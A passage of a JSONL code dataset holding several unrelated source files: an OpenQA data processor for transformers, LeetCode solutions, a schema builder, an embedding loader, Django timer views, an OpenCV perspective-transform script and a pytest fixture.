possible_input_pids, # added by Jong-Hoon Oh \n possible_attention_masks,\n possible_token_type_ids,\n possible_start_positions,\n possible_end_positions,\n possible_labels,\n )\n\n # return all of the features, dataset, and possible_dataset\n return features, dataset, possible_dataset\n\t# (We did not touch this 'tensor_flow' part, since our code does not support tensorflow)\n elif return_dataset == \"tf\": # tensor_flow type \n if not is_tf_available():\n raise RuntimeError(\"TensorFlow must be installed to return a TensorFlow dataset.\")\n\n def gen():\n for ex in features:\n yield (\n {\n \"input_ids\": ex.input_ids,\n \"attention_mask\": ex.attention_mask,\n \"token_type_ids\": ex.token_type_ids,\n },\n {\n \"start_position\": ex.start_position,\n \"end_position\": ex.end_position,\n \"cls_index\": ex.cls_index,\n \"p_mask\": ex.p_mask,\n \"is_impossible\": ex.is_impossible,\n },\n )\n\n return tf.data.Dataset.from_generator(\n gen,\n (\n {\"input_ids\": tf.int32, \"attention_mask\": tf.int32, \"token_type_ids\": tf.int32},\n {\n \"start_position\": tf.int64,\n \"end_position\": tf.int64,\n \"cls_index\": tf.int64,\n \"p_mask\": tf.int32,\n \"is_impossible\": tf.int32,\n },\n ),\n (\n {\n \"input_ids\": tf.TensorShape([None]),\n \"attention_mask\": tf.TensorShape([None]),\n \"token_type_ids\": tf.TensorShape([None]),\n },\n {\n \"start_position\": tf.TensorShape([]),\n \"end_position\": tf.TensorShape([]),\n \"cls_index\": tf.TensorShape([]),\n \"p_mask\": tf.TensorShape([None]),\n \"is_impossible\": tf.TensorShape([]),\n },\n ),\n )\n\n return features\n\n\nclass OpenQAProcessor(DataProcessor):\n \"\"\"\n Processor for the Open-domain QA data set.\n \"\"\"\n\n train_file = None\n dev_file = None\n\n def _get_example_from_tensor_dict(self, tensor_dict, evaluate=False):\n if not evaluate:\n answer = tensor_dict[\"answers\"][\"text\"][0].numpy().decode(\"utf-8\")\n answer_start = tensor_dict[\"answers\"][\"answer_start\"][0].numpy()\n answers = [\n {\"answer_start\": start.numpy(), \"text\": text.numpy().decode(\"utf-8\")}\n for start, text in zip(tensor_dict[\"answers\"][\"answer_start\"], tensor_dict[\"answers\"][\"text\"])\n ]\n else:\n answers = [\n {\"answer_start\": start.numpy(), \"text\": text.numpy().decode(\"utf-8\")}\n for start, text in zip(tensor_dict[\"answers\"][\"answer_start\"], tensor_dict[\"answers\"][\"text\"])\n ]\n\n answer = None\n answer_start = None\n\n return OpenQAExample(\n qas_id=tensor_dict[\"id\"].numpy().decode(\"utf-8\"),\n question_text=tensor_dict[\"question\"].numpy().decode(\"utf-8\"),\n context_text=tensor_dict[\"context\"].numpy().decode(\"utf-8\"),\n answer_text=answer,\n start_position_character=answer_start,\n title=tensor_dict[\"title\"].numpy().decode(\"utf-8\"),\n answers=answers,\n )\n\n def get_examples_from_dataset(self, dataset, evaluate=False):\n \"\"\"\n Creates a list of :class:`~transformers.data.processors.openqa.OpenQAExample` using a TFDS dataset.\n\n Args:\n dataset: The tfds dataset loaded from `tensorflow_datasets.load(\"openqa\")`\n evaluate: boolean specifying if in evaluation mode or in training mode\n\n Returns:\n List of OpenQAExample\n\n Examples::\n\n import tensorflow_datasets as tfds\n dataset = tfds.load(\"openqa\")\n\n training_examples = get_examples_from_dataset(dataset, evaluate=False)\n evaluation_examples = get_examples_from_dataset(dataset, evaluate=True)\n \"\"\"\n\n if evaluate:\n dataset = dataset[\"validation\"]\n else:\n dataset = dataset[\"train\"]\n\n examples = []\n for tensor_dict in tqdm(dataset):\n examples.append(self._get_example_from_tensor_dict(tensor_dict, evaluate=evaluate))\n\n return examples\n\n def get_train_examples(self, data_dir, filename=None):\n \"\"\"\n Returns the training examples from the data directory.\n\n Args:\n data_dir: Directory containing the data files used for training and evaluating.\n filename: None by default, specify this if the training file has a different name than the original one\n which is `train-v1.1.json` and `train-v2.0.json` for openqa versions 1.1 and 2.0 respectively.\n\n \"\"\"\n if data_dir is None:\n data_dir = \"\"\n\n if self.train_file is None:\n raise ValueError(\"OpenQAProcessor should be instantiated via OpenQAV1Processor or OpenQAV2Processor\")\n\n with open(\n os.path.join(data_dir, self.train_file if filename is None else filename), \"r\", encoding=\"utf-8\"\n ) as reader:\n input_data = json.load(reader)[\"data\"]\n return self._create_examples(input_data, \"train\")\n\n def get_dev_examples(self, data_dir, filename=None):\n \"\"\"\n Returns the evaluation example from the data directory.\n\n Args:\n data_dir: Directory containing the data files used for training and evaluating.\n filename: None by default, specify this if the evaluation file has a different name than the original one\n which is `train-v1.1.json` and `train-v2.0.json` for openqa versions 1.1 and 2.0 respectively.\n \"\"\"\n if data_dir is None:\n data_dir = \"\"\n\n if self.dev_file is None:\n raise ValueError(\"OpenQAProcessor should be instantiated via OpenQAV1Processor or OpenQAV2Processor\")\n\n with open(\n os.path.join(data_dir, self.dev_file if filename is None else filename), \"r\", encoding=\"utf-8\"\n ) as reader:\n input_data = json.load(reader)[\"data\"]\n return self._create_examples(input_data, \"dev\")\n\n def _create_examples(self, input_data, set_type):\n is_training = set_type == \"train\"\n examples = []\n for entry in tqdm(input_data):\n title = entry[\"title\"]\n for paragraph in entry[\"paragraphs\"]:\n context_text = paragraph[\"context\"] # passage\n npm_context_text = paragraph[\"npm_context\"] # npm_passage\n for qa in paragraph[\"qas\"]:\n qas_id = str(qa[\"id\"][0]) + \" \" +str(qa[\"id\"][1]) # open-domain QA spec.\n question_text = qa[\"question\"]\n npm_question_text = qa[\"npm_question\"]\n start_position_character = None\n answer_text = None\n answers = []\n\n if \"is_impossible\" in qa:\n is_impossible = qa[\"is_impossible\"] # v2.0 spec.\n else:\n is_impossible = False # otherwise is_impossible is set to 'False'\n\n if not is_impossible:\n if is_training:\n # only the first answer for training\n # Quasar-T and SearchQA has a single answer for each question.\n answer = qa[\"answers\"][0] \n answer_text = answer[\"text\"]\n start_position_character = answer[\"answer_start\"]\n else:\n answers = qa[\"answers\"]\n\n example = OpenQAExample(\n qas_id=qas_id,\n question_text=question_text,\n context_text=context_text,\n answer_text=answer_text,\n npm_question_text=npm_question_text,\n npm_context_text=npm_context_text,\n start_position_character=start_position_character,\n title=title,\n is_impossible=is_impossible,\n answers=answers,\n )\n\n examples.append(example)\n return examples\n\n\nclass OpenQAV1Processor(OpenQAProcessor): # this class is not used \n train_file = \"train-v1.1.json\"\n dev_file = \"dev-v1.1.json\"\n\n\nclass OpenQAV2Processor(OpenQAProcessor): # this class is not used \n train_file = \"train-v2.0.json\"\n dev_file = \"dev-v2.0.json\"\n\n\n# added/modified by Jong-Hoon Oh\nclass OpenQAExample(object):\n \"\"\"\n A single training/test example for the OpenQA dataset, as loaded from disk.\n\n Args:\n qas_id: The example's unique identifier\n question_text: The question string\n context_text: The context string\n answer_text: The answer string\n npm_question_text: The NP masked version of the question string,\n npm_context_text: The NP masked version of the context string\n start_position_character: The character position of the start of the answer\n title: The title of the example\n answers: None by default, this is used during evaluation. Holds answers as well as their start positions.\n is_impossible: False by default, set to True if the example has no possible answer.\n \"\"\"\n\n def __init__(\n self,\n qas_id,\n question_text,\n context_text,\n answer_text,\n npm_question_text,\n npm_context_text,\n start_position_character,\n title,\n answers=[],\n is_impossible=False,\n ):\n self.qas_id = qas_id\n self.question_text = question_text\n self.context_text = context_text\n self.npm_question_text = npm_question_text\n self.npm_context_text = npm_context_text\n self.answer_text = answer_text\n self.title = title\n self.is_impossible = is_impossible\n self.answers = answers\n\n self.start_position, self.end_position = 0, 0\n\n doc_tokens = []\n q_tokens = []\n npm_doc_tokens = []\n npm_q_tokens = []\n char_to_word_offset = []\n prev_is_whitespace = True\n\n # Split on whitespace so that different tokens may be attributed to their original position.\n # char to word idx mapping (for each character c, check white space and segment texts into words according to the white space)\n for c in self.context_text:\n if _is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n doc_tokens.append(c)\n else:\n doc_tokens[-1] += c\n prev_is_whitespace = False\n char_to_word_offset.append(len(doc_tokens) - 1)\n\n self.doc_tokens = doc_tokens\n self.char_to_word_offset = char_to_word_offset\n\n prev_is_whitespace = True\n for c in self.question_text:\n if _is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n q_tokens.append(c)\n else:\n q_tokens[-1] += c\n prev_is_whitespace = False\n self.q_tokens = q_tokens\n\n if start_position_character is not None and not is_impossible:\n self.start_position = char_to_word_offset[start_position_character]\n self.end_position = char_to_word_offset[\n min(start_position_character + len(answer_text) - 1, len(char_to_word_offset) - 1)\n ]\n\n\n \"\"\" npm (NP-Masked) text processing \"\"\"\n # Split on whitespace so that different tokens may be attributed to their original position.\n # char to word idx mapping (for each character c, check white space and segment texts into words according to the white space)\n prev_is_whitespace = True\n for c in self.npm_context_text:\n if _is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n npm_doc_tokens.append(c)\n else:\n npm_doc_tokens[-1] += c\n prev_is_whitespace = False\n\n self.npm_doc_tokens = npm_doc_tokens\n\n prev_is_whitespace = True\n for c in self.npm_question_text:\n if _is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n npm_q_tokens.append(c)\n else:\n npm_q_tokens[-1] += c\n prev_is_whitespace = False\n self.npm_q_tokens = npm_q_tokens\n\n# added/modified by Jong-Hoon Oh\nclass OpenQAFeatures(object):\n \"\"\"\n Single openqa example features to be fed to a model.\n Those features are model-specific and can be crafted from :class:`~transformers.data.processors.openqa.OpenQAExample`\n using the :method:`~transformers.data.processors.openqa.openqa_convert_examples_to_features` method.\n\n Args:\n input_ids: Indices of input sequence tokens in the vocabulary.\n attention_mask: Mask to avoid performing attention on padding token indices.\n token_type_ids: Segment token indices to indicate first and second portions of the inputs.\n cls_index: the index of the CLS token.\n p_mask: Mask identifying tokens that can be answers vs. tokens that cannot.\n Mask with 1 for tokens than cannot be in the answer and 0 for token that can be in an answer\n example_index: the index of the example\n unique_id: The unique Feature identifier\n paragraph_len: The length of the context\n token_is_max_context: List of booleans identifying which tokens have their maximum context in this feature object.\n If a token does not have their maximum context in this feature object, it means that another feature object\n has more information related to that token and should be prioritized over this feature for that token.\n tokens: list of tokens corresponding to the input ids\n token_to_orig_map: mapping between the tokens and the original text, needed in order to identify the answer.\n start_position: start of the answer token index\n end_position: end of the answer token index\n is_impossible: False by default, set to True if the example has no possible answer.\n \"\"\"\n\n def __init__(\n self,\n input_ids,\n attention_mask,\n token_type_ids,\n cls_index,\n p_mask,\n example_index,\n unique_id,\n paragraph_len,\n token_is_max_context,\n tokens,\n token_to_orig_map,\n start_position,\n end_position,\n is_impossible,\n ):\n self.input_ids = input_ids\n self.attention_mask = attention_mask\n self.token_type_ids = token_type_ids\n self.cls_index = cls_index\n self.p_mask = p_mask\n\n self.example_index = example_index\n self.unique_id = unique_id\n self.paragraph_len = paragraph_len\n self.token_is_max_context = token_is_max_context\n self.tokens = tokens\n self.token_to_orig_map = token_to_orig_map\n\n self.start_position = start_position\n self.end_position = end_position\n self.is_impossible = is_impossible\n\n# added/modified by Jong-Hoon Oh\nclass OpenQAFeatures_for_cnn(object):\n \"\"\"\n Single openqa example features to be fed to a cnn model.\n Those features are model-specific and can be crafted from :class:`~transformers.data.processors.openqa.OpenQAExample`\n using the :method:`~transformers.data.processors.openqa.openqa_convert_examples_to_features` method.\n\n Args:\n input_ids: Indices of input sequence tokens in the vocabulary.\n cnn_qids: Indices of input question tokens in the CNN vocabulary\n cnn_pids: Indices of input passage tokens in the CNN vocabulary\n cnn_qmasks: Mask of input question tokens for padding \n cnn_pmasks: Mask of input passage tokens for padding \n attention_mask: Mask to avoid performing attention on padding token indices.\n token_type_ids: Segment token indices to indicate first and second portions of the inputs.\n cls_index: the index of the CLS token.\n p_mask: Mask identifying tokens that can be answers vs. tokens that cannot.\n Mask with 1 for tokens than cannot be in the answer and 0 for token that can be in an answer\n example_index: the index of the example\n unique_id: The unique Feature identifier\n paragraph_len: The length of the context\n token_is_max_context: List of booleans identifying which tokens have their maximum context in this feature object.\n If a token does not have their maximum context in this feature object, it means that another feature object\n has more information related to that token and should be prioritized over this feature for that token.\n tokens: list of tokens corresponding to the input ids\n token_to_orig_map: mapping between the tokens and the original text, needed in order to identify the answer.\n start_position: start of the answer token index\n end_position: end of the answer token index\n is_impossible: False by default, set to True if the example has no possible answer.\n qas_id: The identifier for question-passage-answers\n \"\"\"\n\n def __init__(\n self,\n input_ids,\n cnn_qids,\n cnn_pids,\n cnn_qmasks,\n cnn_pmasks,\n attention_mask,\n token_type_ids,\n cls_index,\n p_mask,\n example_index,\n unique_id,\n paragraph_len,\n token_is_max_context,\n tokens,\n token_to_orig_map,\n start_position,\n end_position,\n is_impossible,\n qas_id,\n ):\n self.input_ids = input_ids\n self.input_qids = cnn_qids\n self.input_pids = cnn_pids\n self.qmasks = cnn_qmasks\n self.pmasks = cnn_pmasks\n self.attention_mask = attention_mask\n self.token_type_ids = token_type_ids\n self.cls_index = cls_index\n self.p_mask = p_mask\n\n self.example_index = example_index\n self.unique_id = unique_id\n self.paragraph_len = paragraph_len\n self.token_is_max_context = token_is_max_context\n self.tokens = tokens\n self.token_to_orig_map = token_to_orig_map\n\n self.start_position = start_position\n self.end_position = end_position\n self.is_impossible = is_impossible\n\n self.qas_id = qas_id\n\n\n# added/modified by Jong-Hoon Oh\nclass OpenQASelectorResult(object):\n \"\"\"\n Constructs a OpenQAResult which can be used to evaluate a model's output on the OpenQA dataset.\n\n Args:\n unique_id: The unique identifier corresponding to that example.\n logits: The logits corresponding to binary classification (relevant passage or not)\n \"\"\"\n\n def __init__(self, unique_id, logits):\n self.logits = logits\n self.unique_id = unique_id\n\n\n# added/modified by Jong-Hoon Oh\nclass OpenQAResult(object):\n \"\"\"\n Constructs a OpenQAResult which can be used to evaluate a model's output on the OpenQA dataset.\n\n Args:\n unique_id: The unique identifier corresponding to that example.\n start_logits: The logits corresponding to the start of the answer\n end_logits: The logits corresponding to the end of the answer\n \"\"\"\n\n def __init__(self, unique_id, start_logits, end_logits, start_top_index=None, end_top_index=None, cls_logits=None):\n self.start_logits = start_logits\n self.end_logits = end_logits\n self.unique_id = unique_id\n\n if start_top_index:\n self.start_top_index = start_top_index\n self.end_top_index = end_top_index\n self.cls_logits = cls_logits\n","sub_path":"src/transformers/data/processors/openqa.py","file_name":"openqa.py","file_ext":"py","file_size_in_byte":40471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"153890086","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\"\"\"\nleetcode 25 给出一个链表,每 k 个节点一组进行翻转,并返回翻转后的链表。\n\nk 是一个正整数,它的值小于或等于链表的长度。如果节点总数不是 k 的整数倍,那么将最后剩余节点保持原有顺序。\nRuntime: 56 ms, faster than 70.70% of Python3 online submissions for Reverse Nodes in k-Group.\nMemory Usage: 14.3 MB, less than 5.33% of Python3 online submissions for Reverse Nodes in k-Group.\n递归\n\"\"\"\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n curr = head\n count = 0\n\n # find the (k+1)th node\n while curr is not None and count != k:\n curr = curr.next\n count += 1\n\n # 如果节点总数不是 k 的整数倍,那么将最后剩余节点保持原有顺序。\n if count == k:\n # curr 是后面所有的已经反转好的链表的头结点\n curr = self.reverseKGroup(curr, k)\n while count > 0:\n # head 是正在翻转的这一 长度为k的段 记为X 的头结点\n temp = head.next\n head.next = curr\n curr = head\n head = temp\n count -= 1\n # 每次循环断开X的一个连接,把X的当前头连到已翻转的链表的新头上,作为它的前站\n # don't need the following step:\n # temp.next = head\n # (不需要修复X的连接,因为在下一次循环中,这个连接会因满足旧头+新头的关系\n # 而被反向修复)\n head = curr\n return head\n\n","sub_path":"25 Reverse Nodes in k-Group.py","file_name":"25 Reverse Nodes in k-Group.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"207000979","text":"#!/usr/bin/env python3\n\nimport random\nfrom mygraph import rand\n\nrandom.seed(None)\n\ng = rand.undirected_cyclic(['a','b','c','d','e'])\nprint(g)\n\ng = rand.directed_acyclic(['a','b','c','d','e'])\nprint(g)\n","sub_path":"python/rg.py","file_name":"rg.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"306611252","text":"import os\nimport yaml\n\nfrom .exceptions import SchemaRefError\n\nfrom .YAML_CONSTANTS import YAML_CONSTANTS\n\nBASE_SCHEMA = {\n 'type': 'object',\n 'additionalProperties': False,\n 'properties': {\n 'schema': { 'type': 'string' },\n 'survey': { '$ref': '#/$defs/survey' },\n 'translations': {'$ref': '#/$defs/translations' },\n 'choices': { '$ref': '#/$defs/choices' },\n 'settings': {'$ref': '#/$defs/settings'},\n },\n}\n\nproject_path = os.path.dirname(os.path.realpath(__file__))\nYML_DIR = os.path.join(project_path, 'yml')\ndefpath = lambda defid: os.path.join(YML_DIR, 'defs', defid + '.yml')\n\ndef _load_path(fpath):\n with open(fpath, 'r') as ff:\n yaml_in = ff.read()\n for (val, rep_with) in YAML_CONSTANTS:\n if val in yaml_in:\n yaml_in = yaml_in.replace(val, rep_with)\n return yaml.full_load(yaml_in)\n\nBASE_SCHEMA = _load_path(os.path.join(YML_DIR, 'schema.yml'))\n\ndef _collect_refs(obj):\n '''\n iterate through a jsonschema object or list and yield\n 'xyz'\n for any:\n {'$ref':'#/$defs/xyz'}\n that are found\n '''\n unpeel = lambda ss: ss.replace('#/$defs/', '')\n\n if isinstance(obj, dict):\n if '$ref' in obj:\n yield unpeel(obj['$ref'])\n else:\n for item in obj.values():\n for unpeeled in _collect_refs(item):\n yield unpeeled\n elif isinstance(obj, list):\n for item in obj:\n for unpeeled in _collect_refs(item):\n yield unpeeled\n\n\ndef build_schema(base_schema=None):\n if base_schema is None:\n base_schema = BASE_SCHEMA\n loaded = {}\n def load_schema_partials(content):\n for part in _collect_refs(content):\n if part in loaded:\n continue\n _parts = [part, '_{}'.format(part)]\n _files = [defpath(fp) for fp in _parts]\n _exists = [os.path.exists(pf) for pf in _files]\n ref_error = False\n if _exists[0] and _exists[1]:\n ref_error = 'Conflicting ref files for \"#/$defs/{}\": {}, {}'\n elif not (_exists[0] or _exists[1]):\n ref_error = 'No ref file for \"#/$defs/{}\": {} or {}'\n if ref_error:\n raise SchemaRefError(ref_error.format(part, *_parts))\n fpath = _files[0] if _exists[0] else _files[1]\n loaded[part] = _load_path(fpath)\n load_schema_partials(loaded[part])\n load_schema_partials(base_schema)\n return {'$defs': loaded,\n **base_schema}\n\nMAIN_SCHEMA = build_schema()\n","sub_path":"a1d05eba1/build_schema.py","file_name":"build_schema.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624581751","text":"import numpy as np\nfrom nltk.corpus import stopwords\n\ns = set(stopwords.words('english'))\nGloveEmbeddings = {}\nemb_dim = 50\nGloveEmbeddings['zerovec'] = [0]*emb_dim\n# Map embeddings to each word from a pre trained model\n\n\ndef load_embeddings(embeddingfile):\n global GloveEmbeddings, emb_dim\n fe = open(embeddingfile, \"r\", encoding=\"utf-8\", errors=\"ignore\")\n for line in fe:\n tokens = line.strip().split()\n word = tokens[0]\n vec = tokens[1:]\n GloveEmbeddings[word] = vec\n fe.close()\n\n return\n\n# Get the array representation of each text passage / query\n\n\ndef concat_embeddings(text, query=False, max_len_p=50, max_len_q=10):\n # import nltk\n # p = nltk.PorterStemmer()\n if not query:\n filtered_text = list(filter(lambda w: not w in s, text.lower().split()))\n remaining = max_len_p - len(filtered_text)\n if remaining > 0:\n filtered_text += ['zerovec']*remaining\n else:\n filtered_text = filtered_text[:max_len_p]\n else:\n filtered_text = text.lower().split()\n remaining = max_len_q - len(filtered_text)\n if remaining > 0:\n filtered_text += ['zerovec']*remaining\n else:\n filtered_text = filtered_text[:max_len_q]\n\n processed = [\"\".join(list(filter(str.isalnum, text))) for text in filtered_text]\n # singularize = [p.stem(word) for word in processed]\n vector_array = []\n\n for i, word in enumerate(processed):\n if word in GloveEmbeddings:\n vector_array.append([float(x) for x in GloveEmbeddings[word]])\n else:\n vector_array.append(GloveEmbeddings['zerovec'])\n\n return vector_array\n\n\ndef batch_iter(data, batch_size, num_epochs, shuffle=False):\n \"\"\"\n Generates a batch iterator for a dataset.\n \"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((len(data)-1)/batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield shuffled_data[start_index:end_index]","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"320892074","text":"class Solution(object):\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: None Do not return anything, modify nums1 in-place instead.\n \"\"\"\n nums1[m:] = nums2\n nums1.sort()\n\n\n# 双指针\nclass Solution(object):\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: None Do not return anything, modify nums1 in-place instead.\n \"\"\"\n # O(m+n), space O(1)\n k = (m + n - 1)\n i = m - 1\n j = n - 1\n while i >= 0 and j >= 0:\n if nums1[i] > nums2[j]:\n nums1[k] = nums1[i]\n i = i - 1\n else:\n nums1[k] = nums2[j]\n j = j - 1\n k = k - 1\n # 退出上面循环有两种可能:1.i>=0 2.j>=0\n # i >=0 时代表nums2中元素已经全部插入到nums1中了,结束\n # 当j >=0 时代表nums2中元素还有没插入到nums1中的,继续把nums2中剩余元素插入到nums1中\n while j >= 0:\n nums1[k] = nums2[j]\n k = k - 1\n j = j - 1\n","sub_path":"题目分类/双指针/merge_sorted_array_88.py","file_name":"merge_sorted_array_88.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"484095747","text":"# Django imports\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\n# Other imports\nimport sqlite3\nfrom datetime import datetime, timedelta, time\nimport calendar\n# My imports\nfrom .forms import TimerForm\nfrom .models import Timer\n\n@login_required\ndef show(request, user_id):\n \"\"\"Shows the timer template with form to be saved in db after measuring.\"\"\"\n user = User.objects.get(id=user_id)\n if request.user != user:\n raise Http404\n else:\n if request.method != 'POST':\n form = TimerForm()\n else:\n form = TimerForm(data=request.POST)\n new_score = form.save(commit=False)\n new_score.user = user # assigning the user_id to the result\n new_score.save()\n return HttpResponseRedirect(reverse('users:profile', args=[user_id]))\n return render(request, 'timer/show.html', {'form' : form, 'user' : user})\n\n@login_required\ndef all(request, user_id):\n \"\"\"Showing overall statement assigned to the user who's checking it.\"\"\"\n user = User.objects.get(id=user_id)\n if request.user != user:\n raise Http404\n else:\n timers = Timer.objects.filter(user_id=user_id) # Shows all scores of user.\n data = data_dict(timers) # My function that sums all scores into hours.\n name = \"Overall statement\" # Heading displayed in the template.\n\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef today(request, user_id):\n \"\"\"Showing today statement of the user.\"\"\"\n today_filter = datetime.now().date() # Current date.\n # name - Heading displayed in the template.\n name = datetime.now().date().strftime(\"%B %d\")\n # timers - Scores filtered by current date and user id.\n timers = Timer.objects.filter(date__date=today_filter, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers) # Scores summed into hours.\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef yesterday(request, user_id):\n \"\"\"Showing yesterday statement of the user.\"\"\"\n today = datetime.now().date() # Current date.\n yesterday = today - timedelta(days=1)\n name = yesterday.strftime(\"%B %d\") # Heading displayed in the template.\n\n # timers - Scores filtered by yesterday's date and user id.\n timers = Timer.objects.filter(date__date=yesterday, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers) # Scores summed into hours, using my function.\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef two_days(request, user_id):\n \"\"\"Showing two days ago statement of the user.\"\"\"\n today = datetime.now().date()\n two_days = today - timedelta(days=2)\n name = two_days.strftime(\"%B %d\")\n\n # timers - Scores filtered by two days ago date and user id.\n timers = Timer.objects.filter(date__date=two_days, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers) # Scores summed into hours.\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef three_days(request, user_id):\n \"\"\"Showing three days ago statement of the user. Same logic as above.\"\"\"\n today = datetime.now().date()\n three_days = today - timedelta(days=3)\n name = three_days.strftime(\"%B %d\")\n\n timers = Timer.objects.filter(date__date=three_days, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers)\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef week(request, user_id):\n \"\"\"Showing whole previous week statement of the user.\"\"\"\n today = datetime.now()\n week_number = int(today.strftime(\"%W\")) - 1 # Acquiring previous week number\n d = \"2017-W{}\".format(week_number) # Date format to get week date.\n\n # week_last - last day of chosen week(month, day). week_first - first day.\n week_last = datetime.strptime(d + \"-0\", \"%Y-W%W-%w\").date().strftime(\"%B %d\")\n week_first = datetime.strptime(d + \"-1\", \"%Y-W%W-%w\").date().strftime(\"%B %d\")\n\n name = \"{} - {}\".format(week_first, week_last)\n timers = Timer.objects.filter(date__week=week_number, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers)\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef month(request, user_id):\n \"\"\"Showing whole previous month statement of the user.\"\"\"\n today = datetime.now()\n month_number = int(today.strftime(\"%m\")) - 1 # Acquiring previous month no.\n\n # name - heading displayed in the template generated using calendar module.\n name = calendar.month_name[month_number]\n timers = Timer.objects.filter(date__month=month_number, user_id=user_id)\n user = User.objects.get(id=user_id)\n data = data_dict(timers)\n\n if request.user != user:\n raise Http404\n else:\n context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n return render(request, 'timer/history/choices.html', context)\n\ndef data_dict(timers):\n \"\"\"Function creating data dictionairy used as data to charts. It sums all\n minutes and hours from db into rounded hours.\"\"\"\n data = {}\n for timer in timers: # Iterating through all the results.\n # Rounds hours to one decimal point.\n hours = [round((timer.minutes / 60), 4) + timer.hours]\n if not timer.activity in data: # If activity name not in data dict,\n data[timer.activity] = hours # add it with value of hours.\n else: # If it is in data, append it's values into list.\n data[timer.activity].append(float(sum(hours)))\n\n# Every key has it's own list of values now, and these lists needs to be summed.\n for key, value in data.items():\n data[key] = sum(data[key]) # Sum the lists of values.\n return data\n","sub_path":"timer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"22639077","text":"'''\ncv2.getPerspectiveTransform(src, #原图像即数组(图像坐标点)\n dst) #目标图像即数组(图像坐标点)\n\ncv2.warpPerspective(src, 输入图像\n M, 变换矩阵\n dsize,变换后输出图像尺寸\n dst=None,输出图像,默认None\n flags=None,插值方法\n borderMode=None,边界像素外扩方式\n borderValue=None)边界像素插值,默认用0填充\n'''\n\n\nimport numpy as np\nimport cv2\n\nimg=cv2.imread('photo1.jpg')\nimg1=img.copy()\n\nsrc = np.float32([[207, 151], [517, 285], [17, 601], [343, 731]])\ndst = np.float32([[0, 0], [337, 0], [0, 488], [337, 488]])\n\nprint(img.shape)\n\n# 生成透视变换矩阵;进行透视变换\nmt=cv2.getPerspectiveTransform(src,dst)\n\nprint('透视变换矩阵:')\nprint(mt)\n#透视变换\nresult=cv2.warpPerspective(img1,#需变换的图像\n mt,#变换矩阵\n (338,488))#变换后图像大小\n\ncv2.imshow('original image:',img)\ncv2.imshow('transformed image:',result)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n","sub_path":"64-徐鹏-安徽/week04/perspective_transform.py","file_name":"perspective_transform.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"397754477","text":"import pytest\nimport pathlib\n\nfrom osp_pipeline.catalog.models.crossref import CrossrefRecord\nfrom osp_pipeline.catalog.models.viaf import VIAFCluster\nfrom osp_pipeline.catalog.models.marc import LOCRecord, OTLRecord\n\nfrom osp_pipeline.catalog import data_path\n\n\n@pytest.yield_fixture(scope=\"module\")\ndef loc(sc, spark):\n \"\"\"Build normalized LOC dataframe\"\"\"\n p = str(pathlib.Path(__file__).parent / 'loc_fixtures')\n df = LOCRecord.from_files(p)\n df.cache()\n yield df\n 